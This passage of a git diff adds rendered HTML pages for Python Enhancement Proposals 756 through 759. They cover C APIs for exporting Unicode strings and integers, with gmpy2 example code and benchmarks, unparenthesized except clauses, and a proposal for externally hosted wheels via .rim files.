  • pemja (0.4.1)
  • +
  • pyahocorasick (2.0.0)
  • +
  • pyjson5 (1.6.6)
  • +
  • rapidfuzz (3.6.2)
  • +
  • regex (2023.12.25)
  • +
  • srsly (2.4.8)
  • +
  • tokenizers (0.15.2)
  • +
  • ujson (5.9.0)
  • +
  • unicodedata2 (15.1.0)
  • +
+
+
+

PyUnicode_2BYTE_DATA() and PyUnicode_4BYTE_DATA()

+

21 projects call PyUnicode_2BYTE_DATA() and/or +PyUnicode_4BYTE_DATA():

+
    +
  • Cython (3.0.9)
  • +
  • MarkupSafe (2.1.5)
  • +
  • Nuitka (2.1.2)
  • +
  • PyICU (2.12)
  • +
  • PyICU-binary (2.7.4)
  • +
  • PyQt5_sip (12.13.0)
  • +
  • PyQt6_sip (13.6.0)
  • +
  • biopython (1.83)
  • +
  • catboost (1.2.3)
  • +
  • cement (3.0.10)
  • +
  • cffi (1.16.0)
  • +
  • duckdb (0.10.0)
  • +
  • mypy (1.9.0)
  • +
  • numpy (1.26.4)
  • +
  • orjson (3.9.15)
  • +
  • pemja (0.4.1)
  • +
  • pyahocorasick (2.0.0)
  • +
  • pyjson5 (1.6.6)
  • +
  • pyobjc-core (10.2)
  • +
  • sip (6.8.3)
  • +
  • wxPython (4.2.1)
  • +
+
+
+
+

Rejected Ideas

+
+

Reject embedded NUL characters and require trailing NUL character

+

In C, it’s convenient to have a trailing NUL character. For example, +the for (; *str != 0; str++) loop can be used to iterate on +characters and strlen() can be used to get a string length.

+

The problem is that a Python str object can embed NUL characters. +Example: "ab\0c". If a string contains an embedded NUL character, +code relying on the NUL character to find the string end truncates the +string. It can lead to bugs, or even security vulnerabilities. +See a previous discussion in the issue Change PyUnicode_AsUTF8() +to return NULL on embedded null characters.

+

Rejecting embedded NUL characters would require scanning the string, which has O(n) complexity.

+
+
+

Reject surrogate characters

+

Surrogate characters are characters in the Unicode range [U+D800; +U+DFFF]. They are disallowed by UTF codecs such as UTF-8. A Python +str object can contain arbitrary lone surrogate characters. Example: +"\uDC80".

+

Rejecting surrogate characters prevents exporting a string which contains +such a character. It can be surprising and annoying since the +PyUnicode_Export() caller doesn’t control the string contents.

+

Allowing surrogate characters makes it possible to export any string, and so avoids this issue. For example, the UTF-8 codec can be used with the surrogatepass error handler to encode and decode surrogate characters.

+
+
+

Conversions on demand

+

It would be convenient to convert formats on demand. For example, +convert UCS-1 and UCS-2 to UCS-4 if an export to only UCS-4 is +requested.

+

The problem is that most users expect an export to require no memory +copy and no conversion: an O(1) complexity. It is better to have an +API where all operations have an O(1) complexity.

+
+
+

Export to UTF-8

+

CPython 3.14 has a cache to encode a string to UTF-8. It is tempting to +allow exporting to UTF-8.

+

The problem is that the UTF-8 cache doesn’t support surrogate +characters. An export is expected to provide the whole string content, +including embedded NUL characters and surrogate characters. To export +surrogate characters, a different code path using the surrogatepass +error handler is needed and each export operation has to allocate a +temporary buffer: O(n) complexity.

+

An export is expected to have an O(1) complexity, so the idea of exporting UTF-8 in CPython was abandoned.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0756.rst

+

Last modified: 2024-10-29 17:09:35 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0757/index.html b/pep-0757/index.html new file mode 100644 index 00000000000..075327a8778 --- /dev/null +++ b/pep-0757/index.html @@ -0,0 +1,710 @@ + + + + + + + + PEP 757 – C API to import-export Python integers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 757 – C API to import-export Python integers

+
+
Author:
+
Sergey B Kirpichev <skirpichev at gmail.com>, +Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
14-Sep-2024
+
Resolution:
+
08-Dec-2024
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the Export API and the PyLongWriter API.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Add a new C API to import and export Python integers, int objects: +especially PyLongWriter_Create() and PyLong_Export() functions.

+
+
+

Rationale

+

Projects such as gmpy2, SAGE and Python-FLINT directly access Python “internals” (the PyLongObject structure) or use an inefficient temporary format (hex strings for Python-FLINT) to import and export Python int objects. The Python int implementation changed in Python 3.12 to add a tag and “compact values”.

+

In the 3.13 alpha 1 release, the private undocumented _PyLong_New() +function had been removed, but it is being used by these projects to +import Python integers. The private function has been restored in 3.13 +alpha 2.

+

An efficient public abstraction is needed to interface Python with these projects without exposing implementation details. It would allow Python to change its internals without breaking these projects. For example, the implementation for gmpy2 was changed recently for CPython 3.9 and again for CPython 3.12.

+
+
+

Specification

+
+

Layout API

+

Data needed by GMP-like import-export +functions.

+
+
+struct PyLongLayout
+
Layout of an array of “digits” (“limbs” in the GMP terminology), used to +represent absolute value for arbitrary precision integers.

Use PyLong_GetNativeLayout() to get the native layout of Python +int objects, used internally for integers with “big enough” +absolute value.

+

See also sys.int_info which exposes similar information to Python.

+
+
+uint8_t bits_per_digit
+
Bits per digit. For example, a 15 bit digit means that bits 0-14 +contain meaningful information.
+ +
+
+uint8_t digit_size
+
Digit size in bytes. For example, a 15 bit digit will require at least +2 bytes.
+ +
+
+int8_t digits_order
+
Digits order:
    +
  • 1 for most significant digit first
  • +
  • -1 for least significant digit first
  • +
+
+ +
+
+int8_t digit_endianness
+
Digit endianness:
    +
  • 1 for most significant byte first (big endian)
  • +
  • -1 for least significant byte first (little endian)
  • +
+
+ +
+ +
+
+const PyLongLayout *PyLong_GetNativeLayout(void)
+
Get the native layout of Python int objects.

See the PyLongLayout structure.

+

The function must not be called before Python initialization nor after +Python finalization. The returned layout is valid until Python is +finalized. The layout is the same for all Python sub-interpreters and +so it can be cached.

+
+ +
+
+

Export API

+
+
+struct PyLongExport
+
Export of a Python int object.

There are two cases:

+ +
+
+int64_t value
+
The native integer value of the exported int object. +Only valid if digits is NULL.
+ +
+
+uint8_t negative
+
1 if the number is negative, 0 otherwise. +Only valid if digits is not NULL.
+ +
+
+Py_ssize_t ndigits
+
Number of digits in digits array. +Only valid if digits is not NULL.
+ +
+
+const void *digits
+
Read-only array of unsigned digits. Can be NULL.
+ +
+ +

If PyLongExport.digits is not NULL, a private field of the PyLongExport structure stores a strong reference to the Python int object to make sure that the structure remains valid until PyLong_FreeExport() is called.

+
+
+int PyLong_Export(PyObject *obj, PyLongExport *export_long)
+
Export a Python int object.

export_long must point to a PyLongExport structure allocated +by the caller. It must not be NULL.

+

On success, fill in *export_long and return 0. +On error, set an exception and return -1.

+

PyLong_FreeExport() must be called when the export is no longer +needed.

+

CPython implementation detail: This function always succeeds if obj is +a Python int object or a subclass.

+
+ +

On CPython 3.14, no memory copy is needed in PyLong_Export(); it’s just a thin wrapper exposing the Python int object’s internal digits array.

+
+
+void PyLong_FreeExport(PyLongExport *export_long)
+
Release the export export_long created by PyLong_Export().

CPython implementation detail: Calling PyLong_FreeExport() is +optional if export_long->digits is NULL.

+
+ +
+
+

Import API

+

The PyLongWriter API can be used to import an integer.

+
+
+struct PyLongWriter
+
A Python int writer instance.

The instance must be destroyed by PyLongWriter_Finish() or +PyLongWriter_Discard().

+
+ +
+
+PyLongWriter *PyLongWriter_Create(int negative, Py_ssize_t ndigits, void **digits)
+
Create a PyLongWriter.

On success, allocate *digits and return a writer. +On error, set an exception and return NULL.

+

negative is 1 if the number is negative, or 0 otherwise.

+

ndigits is the number of digits in the digits array. It must be +greater than 0.

+

digits must not be NULL.

+

After a successful call to this function, the caller should fill in the +array of digits digits and then call PyLongWriter_Finish() to get +a Python int. +The layout of digits is described by PyLong_GetNativeLayout().

+

Digits must be in the range [0; (1 << bits_per_digit) - 1] +(where the bits_per_digit is the number of bits +per digit). +Any unused most significant digits must be set to 0.

+

Alternately, call PyLongWriter_Discard() to destroy the writer +instance without creating an int object.

+
+ +

On CPython 3.14, the PyLongWriter_Create() implementation is a thin +wrapper to the private _PyLong_New() function.

+
+
+PyObject *PyLongWriter_Finish(PyLongWriter *writer)
+
Finish a PyLongWriter created by PyLongWriter_Create().

On success, return a Python int object. +On error, set an exception and return NULL.

+

The function takes care of normalizing the digits and converts the +object to a compact integer if needed.

+

The writer instance and the digits array are invalid after the call.

+
+ +
+
+void PyLongWriter_Discard(PyLongWriter *writer)
+
Discard a PyLongWriter created by PyLongWriter_Create().

writer must not be NULL.

+

The writer instance and the digits array are invalid after the call.
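Putting the writer API together, here is a hedged sketch (make_small_int is a hypothetical helper; real code would prefer existing APIs such as PyLong_FromLong() for such small values, as discussed in the next section):

#include <Python.h>
#include <stdint.h>

/* Hypothetical helper: create the Python int 123 via the writer API,
   only to illustrate the digit-filling protocol. */
static PyObject *
make_small_int(void)
{
    const PyLongLayout *layout = PyLong_GetNativeLayout();
    void *digits;
    PyLongWriter *writer = PyLongWriter_Create(/*negative=*/0,
                                               /*ndigits=*/1, &digits);
    if (writer == NULL) {
        return NULL;
    }
    /* One digit suffices: bits_per_digit is 15 or 30 on CPython,
       and 123 < (1 << bits_per_digit). */
    if (layout->digit_size == 2) {
        *(uint16_t *)digits = 123;
    }
    else if (layout->digit_size == 4) {
        *(uint32_t *)digits = 123;
    }
    else {
        PyLongWriter_Discard(writer);  /* unexpected layout: give up */
        PyErr_SetString(PyExc_SystemError, "unsupported digit size");
        return NULL;
    }
    return PyLongWriter_Finish(writer);
}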

+
+ +
+
+
+

Optimize import for small integers

+

The proposed import API is efficient for large integers. Compared to directly accessing Python internals, the proposed import API can have a significant performance overhead for small integers.

+

For small integers of a few digits (for example, 1 or 2 digits), existing APIs +can be used:

+ +
+
+

Implementation

+ +
+
+

Benchmarks

+

Code:

+
/* Query parameters of Python’s internal representation of integers. */
+const PyLongLayout *layout = PyLong_GetNativeLayout();
+
+size_t int_digit_size = layout->digit_size;
+int int_digits_order = layout->digits_order;
+size_t int_bits_per_digit = layout->bits_per_digit;
+size_t int_nails = int_digit_size*8 - int_bits_per_digit;
+int int_endianness = layout->digit_endianness;
+
+
+
+

Export: PyLong_Export() with gmpy2

+

Code:

+
static int
+mpz_set_PyLong(mpz_t z, PyObject *obj)
+{
+    static PyLongExport long_export;
+
+    if (PyLong_Export(obj, &long_export) < 0) {
+        return -1;
+    }
+
+    if (long_export.digits) {
+        mpz_import(z, long_export.ndigits, int_digits_order, int_digit_size,
+                   int_endianness, int_nails, long_export.digits);
+        if (long_export.negative) {
+            mpz_neg(z, z);
+        }
+        PyLong_FreeExport(&long_export);
+    }
+    else {
+        const int64_t value = long_export.value;
+
+        if (LONG_MIN <= value && value <= LONG_MAX) {
+            mpz_set_si(z, value);
+        }
+        else {
+            mpz_import(z, 1, -1, sizeof(int64_t), 0, 0, &value);
+            if (value < 0) {
+                mpz_t tmp;
+                mpz_init(tmp);
+                mpz_ui_pow_ui(tmp, 2, 64);
+                mpz_sub(z, z, tmp);
+                mpz_clear(tmp);
+            }
+        }
+    }
+    return 0;
+}
+
+
+

Reference code: mpz_set_PyLong() in the gmpy2 master for commit 9177648.

+

Benchmark:

+
import pyperf
+from gmpy2 import mpz
+
+runner = pyperf.Runner()
+runner.bench_func('1<<7', mpz, 1 << 7)
+runner.bench_func('1<<38', mpz, 1 << 38)
+runner.bench_func('1<<300', mpz, 1 << 300)
+runner.bench_func('1<<3000', mpz, 1 << 3000)
+
+
+

Results on Linux Fedora 40 with CPU isolation, Python built in release +mode:

+
Benchmark         ref        pep757
---------------   --------   ----------------------
1<<7              91.3 ns    89.9 ns: 1.02x faster
1<<38             120 ns     94.9 ns: 1.27x faster
1<<300            196 ns     203 ns: 1.04x slower
1<<3000           939 ns     945 ns: 1.01x slower
Geometric mean    (ref)      1.05x faster
+
+
+

Import: PyLongWriter_Create() with gmpy2

+

Code:

+
static PyObject *
+GMPy_PyLong_From_MPZ(MPZ_Object *obj, CTXT_Object *context)
+{
+    if (mpz_fits_slong_p(obj->z)) {
+        return PyLong_FromLong(mpz_get_si(obj->z));
+    }
+
+    size_t size = (mpz_sizeinbase(obj->z, 2) +
+                   int_bits_per_digit - 1) / int_bits_per_digit;
+    void *digits;
+    PyLongWriter *writer = PyLongWriter_Create(mpz_sgn(obj->z) < 0, size,
+                                               &digits);
+    if (writer == NULL) {
+        return NULL;
+    }
+
+    mpz_export(digits, NULL, int_digits_order, int_digit_size,
+               int_endianness, int_nails, obj->z);
+
+    return PyLongWriter_Finish(writer);
+}
+
+
+

Reference code: GMPy_PyLong_From_MPZ() in the gmpy2 master for commit 9177648.

+

Benchmark:

+
import pyperf
+from gmpy2 import mpz
+
+runner = pyperf.Runner()
+runner.bench_func('1<<7', int, mpz(1 << 7))
+runner.bench_func('1<<38', int, mpz(1 << 38))
+runner.bench_func('1<<300', int, mpz(1 << 300))
+runner.bench_func('1<<3000', int, mpz(1 << 3000))
+
+
+

Results on Linux Fedora 40 with CPU isolation, Python built in release +mode:

+
Benchmark         ref        pep757
---------------   --------   ----------------------
1<<7              56.7 ns    56.2 ns: 1.01x faster
1<<300            191 ns     213 ns: 1.12x slower
Geometric mean    (ref)      1.03x slower
+

Benchmark hidden because not significant (2): 1<<38, 1<<3000.

+
+
+
+

Backwards Compatibility

+

There is no impact on backward compatibility; only new APIs are added.

+
+
+

Rejected Ideas

+
+

Support arbitrary layout

+

It would be convenient to support arbitrary layouts for importing and exporting Python integers.

+

For example, it was proposed to add a layout parameter to +PyLongWriter_Create() and a layout member to the +PyLongExport structure.

+

The problem is that it’s more complex to implement and not really needed. What’s strictly needed is only an API to import and export integers using the Python “native” layout.

+

If later there are use cases for arbitrary layouts, new APIs can be +added.

+
+
+

Don’t add PyLong_GetNativeLayout() function

+

Currently, most of the information required for int import/export is already available via PyLong_GetInfo() (and sys.int_info). More could be added (such as the order of digits), and this interface doesn’t pose any constraints on the future evolution of PyLongObject.

+

The problem is that PyLong_GetInfo() returns a Python object (a named tuple), not a convenient C structure, which might push people away from it in favor of, e.g., the current semi-private macros such as PyLong_SHIFT and PyLong_BASE.

+
+
+

Provide mpz_import/export-like API instead

+

Another approach to importing/exporting data from int objects would be the following: expect C extensions to provide contiguous buffers, from which CPython then imports (or into which it exports) the absolute value of an integer.

+

API example:

+
struct PyLongLayout {
+    uint8_t bits_per_digit;
+    uint8_t digit_size;
+    int8_t digits_order;
+};
+
+size_t PyLong_GetDigitsNeeded(PyLongObject *obj, PyLongLayout layout);
+int PyLong_Export(PyLongObject *obj, PyLongLayout layout, void *buffer);
+PyLongObject *PyLong_Import(PyLongLayout layout, void *buffer);
+
+
+

This might work for GMP, as it has the mpz_limbs_read() and mpz_limbs_write() functions, which provide the required access to the internals of mpz_t. Other libraries may have to use temporary buffers and then mpz_import/export-like functions on their side.

+

The major drawback of this approach is that it’s much more complex on the CPython side (i.e. the actual conversion between different layouts). For example, the implementation of PyLong_FromNativeBytes() and PyLong_AsNativeBytes() (which together provide a restricted version of the required API) took ~500 LOC in CPython (c.f. ~100 LOC for the current implementation).

+
+
+

Drop value field from the export API

+

With this suggestion, only one export type would exist (an array of “digits”). If such a view is not available for a given integer, it would either be emulated by the export functions or PyLong_Export() would return an error. In both cases, it’s assumed that users will use other C API functions to get “small enough” integers (i.e., ones that fit into some machine integer type), such as PyLong_AsLongAndOverflow(). PyLong_Export() would be inefficient (or just fail) in this case.

+

An example:

+
static int
+mpz_set_PyLong(mpz_t z, PyObject *obj)
+{
+    int overflow;
+#if SIZEOF_LONG == 8
+    long value = PyLong_AsLongAndOverflow(obj, &overflow);
+#else
+    /* Windows has 32-bit long, so use 64-bit long long instead */
+    long long value = PyLong_AsLongLongAndOverflow(obj, &overflow);
+#endif
+    Py_BUILD_ASSERT(sizeof(value) == sizeof(int64_t));
+
+    if (!overflow) {
+        if (LONG_MIN <= value && value <= LONG_MAX) {
+            mpz_set_si(z, (long)value);
+        }
+        else {
+            mpz_import(z, 1, -1, sizeof(int64_t), 0, 0, &value);
+            if (value < 0) {
+                mpz_t tmp;
+                mpz_init(tmp);
+                mpz_ui_pow_ui(tmp, 2, 64);
+                mpz_sub(z, z, tmp);
+                mpz_clear(tmp);
+            }
+        }
+
+    }
+    else {
+        static PyLongExport long_export;
+
+        if (PyLong_Export(obj, &long_export) < 0) {
+            return -1;
+        }
+        mpz_import(z, long_export.ndigits, int_digits_order, int_digit_size,
+                   int_endianness, int_nails, long_export.digits);
+        if (long_export.negative) {
+            mpz_neg(z, z);
+        }
+        PyLong_FreeExport(&long_export);
+    }
+    return 0;
+}
+
+
+

This might look like a simplification from the API designer’s point of view, but it would be less convenient for end users. They would have to follow Python development, benchmark different variants for exporting small integers (is it obvious why the above case was chosen instead of PyLong_AsInt64()?), and perhaps support different code paths for various CPython versions or across different Python implementations.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0757.rst

+

Last modified: 2024-12-16 07:23:59 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0758/index.html b/pep-0758/index.html new file mode 100644 index 00000000000..3bd16459767 --- /dev/null +++ b/pep-0758/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 758 – Allow except and except* expressions without parentheses | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 758 – Allow except and except* expressions without parentheses

+
+
Author:
+
Pablo Galindo <pablogsal at python.org>, Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
TBD
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
30-Sep-2024
+
Python-Version:
+
3.14
+
Post-History:
+
02-Oct-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP [1] proposes to allow unparenthesized except and except* +blocks in Python’s exception handling syntax only when not using the as +clause. Currently, when catching multiple exceptions, parentheses are required +around the exception types. This was a Python 2 remnant. This PEP suggests allowing +the omission of these parentheses, simplifying the syntax, making it more consistent +with other parts of the syntax that make parentheses optional, and improving readability +in certain cases.

+
+
+

Motivation

+

The current syntax for catching multiple exceptions requires parentheses in the +except expression (equivalently for the except* expression). For +example:

+
try:
+    ...
+except (ExceptionA, ExceptionB, ExceptionC):
+    ...
+
+
+

While this syntax is clear and unambiguous, it can be seen as unnecessarily +verbose in some cases, especially when catching a large number of exceptions. By +allowing the omission of parentheses, we can simplify the syntax:

+
try:
+    ...
+except ExceptionA, ExceptionB, ExceptionC:
+    ...
+
+
+

This change would bring the syntax more in line with other comma-separated lists +in Python, such as function arguments, generator expressions inside of a +function call, and tuple literals, where parentheses are optional.

+

The same change would apply to except* expressions. For example:

+
try:
+    ...
+except* ExceptionA, ExceptionB, ExceptionC:
+    ...
+
+
+

When using the as clause to capture the exception instance, parentheses must be used as before. Some users have expressed that they would find it confusing not to require parentheses, as it would be unclear what exactly is being assigned to the target, since in other parts of the language multiple as clauses can be used in similar situations (such as in imports and context managers). This means that if an as clause is added to the previous example, it must be written as:

+
try:
+    ...
+except (ExceptionA, ExceptionB, ExceptionC) as e:
+    ...
+
+
+
+
+

Rationale

+

The decision to allow unparenthesized except blocks is based on the +following considerations:

+
    +
1. Simplicity: Removing the requirement for parentheses simplifies the syntax, making it more consistent with other parts of the language.
2. Readability: In cases where many exceptions are being caught, the removal of parentheses can improve readability by reducing visual clutter.
3. Consistency: This change makes the except clause more consistent with other parts of Python where unambiguous, comma-separated lists don’t require parentheses.
+
+
+

Specification

+

The syntax for the except clause will be modified to allow an unparenthesized +list of exception types. The grammar will be updated as follows:

+
except_block:
+    | 'except' expressions ':' block
+    | 'except' expression 'as' NAME ':' block
+    | 'except' ':' block
+
+except_star_block
+    | 'except' '*' expressions ':' block
+    | 'except' '*' expression 'as' NAME ':' block
+
+
+

This allows both the current parenthesized syntax and the new unparenthesized +syntax while requiring parentheses when the as keyword is used:

+
try:
+    ...
+except (ExceptionA, ExceptionB):  # Still valid
+    ...
+except ExceptionC, ExceptionD:    # New syntax
+    ...
+except (ExceptionE, ExceptionF) as e: # Parentheses still required
+    ...
+
+
+

The semantics of exception handling remain unchanged. The interpreter will catch +any of the listed exceptions, regardless of whether they are parenthesized or +not.

+
+
+

Backwards Compatibility

+

This change is fully backwards compatible. All existing code using parenthesized +except and except* blocks will continue to work without modification. +The new syntax is purely additive and does not break any existing code.

+

It’s worth noting that in Python 2 the unparenthesized syntax was allowed with +two elements, but had different semantics, in which the first element of the +list was used as the exception type and the second element as the capture +variable. This change does not reintroduce the Python 2 semantics, and the +unparenthesized syntax will behave identically to the parenthesized version.

+
+
+

Security Implications

+

There are no known security implications for this change. The semantics of +exception handling remain the same, and this is purely a syntactic change.

+
+
+

How to Teach This

+

For new Python users, the unparenthesized syntax can be taught as the standard +way to catch multiple exceptions:

+
try:
+    risky_operation()
+except ValueError, TypeError, OSError:
+    handle_errors()
+
+
+

For experienced users, it can be introduced as a new, optional syntax that can +be used interchangeably with the parenthesized version. Documentation should +note that both forms are equivalent:

+
# These are equivalent:
+except (ValueError, TypeError):
+    ...
+
+except ValueError, TypeError:
+    ...
+
+
+

It should be emphasized that this is purely a syntactic change and does not +affect the behaviour of exception handling.

+
+
+

Reference Implementation

+

A proof-of-concept implementation is available at +https://github.com/pablogsal/cpython/commits/notuples/. This implementation +modifies the Python parser to accept the new syntax and ensures that it behaves +identically to the parenthesized version.

+
+
+

Rejected Ideas

+
    +
  1. Allowing mixed parenthesized and unparenthesized syntax:
    try:
    +    ...
    +except (ValueError, TypeError), OSError:
    +   ...
    +
    +
    +

    This was rejected due to the potential for confusion and to maintain a clear +distinction between the two styles.

    +
+
+
+

Deferred Ideas

+
    +
1. Allowing unparenthesized expressions when the as keyword is used. We have decided to defer this particular form: given that there isn’t clear consensus either way and there are reasonable arguments for both positions, the safest approach is to keep the parentheses requirement, since it can be removed later if users find the disconnect too acute, whereas removing it now and then deciding it was a bad idea would not be easy to undo.
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0758.rst

+

Last modified: 2024-10-19 19:41:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0759/index.html b/pep-0759/index.html new file mode 100644 index 00000000000..a2a52b5760d --- /dev/null +++ b/pep-0759/index.html @@ -0,0 +1,573 @@ + + + + + + + + PEP 759 – External Wheel Hosting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 759 – External Wheel Hosting

+
+
Author:
+
Barry Warsaw <barry at python.org>, +Ethan Smith <ethan at ethanhs.me>
+
PEP-Delegate:
+
Donald Stufft <donald at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
01-Oct-2024
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a mechanism by which projects hosted on pypi.org can safely host wheel artifacts on external sites other +than PyPI. This PEP explicitly does not propose external hosting of +projects, packages, or their metadata. That functionality is already available +by externally hosting independent package indexes. Because this PEP only +provides a mechanism for projects to customize the download URL for specific +released wheel artifacts, dependency resolution as already implemented by +common installer tools such as pip and +uv does not need to change.

+

This PEP defines what it means to be “safe” in this context, along with a new +package upload file format called a .rim file. It defines how .rim +files affect the metadata returned for a package’s Simple Repository API +in both HTML and JSON formats, and how traditional wheels can easily be turned +into .rim files.

+
+
+

Rationale

+

The Python Package Index, hosted at https://pypi.org, imposes default limits on upload artifact file size (100 MiB) and total project size +(10 GiB). Most projects can comfortably fit within these limits during the lifetime of the +project, through years of uploads. A few projects have encountered these limits, and have +been granted both file size and project size exceptions, allowing them to continue +uploading new releases without having to take more drastic measures, such as removing +files which may potentially still be in use by consumers (e.g. through version pins).

+

A related workaround is the “wheel stub” +approach, which provides an indirect link between PyPI and an external third party package +index, where such limitations can be avoided. Wheel stubs are source distributions (a.k.a. “sdists”) which utilize a PEP 517 build +backend that, instead of turning source code into a binary wheel, performs some logic to +calculate the URL for an existing, externally hosted wheel to download and install. This +approach works, but it obscures the connection between PyPI, the sdist, and the externally +hosted wheel, since there is no way to present this information to pip or other such +tools.

+
+

Historical context

+

In 2013, PEP 438 proposed a “backward-compatible two-phase transition +process” to modify several aspects of release file hosting on PyPI. As this +PEP describes, PyPI originally supported only project and release +registration without also allowing for artifact file hosting. As such, most +projects hosted release file artifacts elsewhere. Artifact hosting was later +added, but the mix of externally and PyPI-hosted files led to a wide range of +usability and potential security-related problems. PEP 438 was an attempt to +provide several facilities to allow external hosting while promoting a +PyPI-first hosting preference.

+

PEP 438 was complex, with three different “hosting modes”, rel metadata in +the simple HTML index pages to signify hosting locations, and a two-phase +transition plan affecting PyPI and installer tools. PEP 438 was ultimately +retracted in 2015 by PEP 470, which acknowledges that PEP 438 did succeed +in…

+
+
bringing about more people to utilize PyPI’s repository features, an +altogether good thing given the global CDN powering PyPI providing speed +ups for a lot of people[…]
+

Instead of external hosting, PEP 470 promoted the use of explicit multiple +repositories, providing full package indexing and artifact hosting, and +enabled through installer tool support, such as pip install +--extra-index-url allowing pip to essentially treat multiple +repositories as one single global repository +for package installation resolution. Because this has been the blessed norm +for so many years, all Python package installation tools support querying +multiple indexes for dependency resolution.

+
+
+

The problem with multiple indexes

+

Why then does this PEP propose to allow a more limited form of external +hosting, and how does this proposal avoid the problems documented in PEP 470?

+

One well-known problem that consolidating multiple indexes enables is +dependency confusion attacks, to +which Python can be particularly vulnerable, due to the algorithm that pip +install uses for resolving package dependencies and preferred versions. The +uv tool addresses this by supporting an additional index strategy option, +whereby users can select between, e.g. a pip-compatible strategy, and a +more limited strategy that prevents such dependency confusion attacks.

+

PEP 708 provides additional background about dependency confusion attacks, +and takes a different approach to preventing them. At its core, PEP 708 allows +repository owners to indicate that projects track across different +repositories, which allows installers to determine how to treat the global +package namespace when combined across multiple repositories. PEP 708 has been +provisionally accepted, pending several required conditions as outlined in PEP +708, some of which may have an indeterminate future. As PEP 708 itself says, +this won’t by itself solve dependency confusion attacks, but is one way to +provide enough information to installers to help minimize these attacks.

+

While there can still be valid use cases for standing up a totally independent +package index (such as providing richer platform support for GPUs until a +fully formed variant proposal +is accepted), this PEP takes a different, simpler approach and doesn’t replace +any of the existing, proposed, or approved package index cooperation +specifications.

+

This PEP also preserves the core purpose of PyPI, and allows it to +remain the traditional, canonical, centralized index of all Python +packages.

+
+
+

Addressing PyPI limits

+

This proposal also addresses the problem of size limits imposed by PyPI, where there is a +default artifact size limit of 100 MiB and a +default overall project size limit of 10 +GiB. Most packages and artifacts can easily fit in these limits, even for packages +containing binary extension modules for a variety of platforms. A small, but important +class of packages routinely exceed these limits, requiring them to submit PyPI exception +request support tickets. It’s not necessarily difficult to get resolution on such +exceptions, but it is a special process that can take some time to resolve, and the +criteria for granting such exceptions aren’t well documented.

+
+
+

Reducing operational complexity

+

Setting up and maintaining an entire package index can be a complex +operational solution, both time and resource intensive. This is especially +true if the main purpose of such an index is just to avoid file size +limitations. The external index approach also imposes a tricky UX on consumers +of projects on the external index, requiring them to understand how CLI +options such as --external-index-url work, along with the security +implications of such flags. It would be much easier for both producers and +consumers of large wheel packages to just set up and maintain a simple web +server, capable of serving individual files with no more complex API than +HTTP GET. Such an interface is also easily cacheable or placed behind a +CDN. Simple HTTP +servers are also much easier to audit for security purposes, easier to proxy, +and usually take much less resources to run, support, and maintain. Even +something like Amazon S3 could be used to +host external wheels.

+

This PEP proposes an approach that favors such operational simplicity.

+
+
+
+

Specification

+

A new type of uploadable file is defined, called a “RIM” (i.e. .rim), or “Remote +Installable Metadata” file. The name evokes the image of a wheel with the tire removed, +and emphasizes that .rim files are easily derived from .whl files. The process of +turning a .whl into a .rim is outlined below. The file name +format exactly matches the wheel file naming format specification, except that RIM files use the suffix +.rim. This means that all the tags used to discriminate .whl files also +distinguish between different .rim files, and thus can be used during dependency +resolution steps, exactly as .whl files are today. In this respect, .whl and +.rim files are interchangeable.

+

The content of a .rim file is nearly identical to .whl files, however .rim +files MUST contain only the .dist-info directory from a wheel. No other top-level +file or directory is allowed in the .rim zip file. The .dist-info directory +MUST contain a single additional file in addition to those allowed in a .whl +file’s .dist-info directory: a file called EXTERNAL-HOSTING.json.

+

This is a JSON file containing the following keys:

+
+
version
This is the file format version, which for this PEP MUST be 1.0.
+
owner
This MUST name the PyPI organization owner of this externally hosted file, for +reasons which will be described in detail below.
+
uri
This is a single URL naming the location of the physical .whl file hosted on an +external site. This URL MUST use the https scheme.
+
size
This is an integer value describing the size in bytes of the physical .whl file on +the remote host.
+
hashes
This is a dictionary of the format described in PEP 694, used to capture the hashes of the physical .whl file, with the same constraints as proposed in that PEP. Since these hashes are immutable once uploaded to PyPI, they serve as a critical validation that the externally hosted wheel hasn’t been corrupted or compromised.
+
+
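
For illustration only, an EXTERNAL-HOSTING.json file for a hypothetical project foo could look like this (the organization name, URL, size, and digest are all placeholders):

{
    "version": "1.0",
    "owner": "foo-org",
    "uri": "https://foo.example.com/wheels/foo-1.0-cp313-cp313-linux_x86_64.whl",
    "size": 213453415,
    "hashes": {
        "sha256": "<hex-encoded digest of the .whl file>"
    }
}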
+

Effects of the RIM file

+

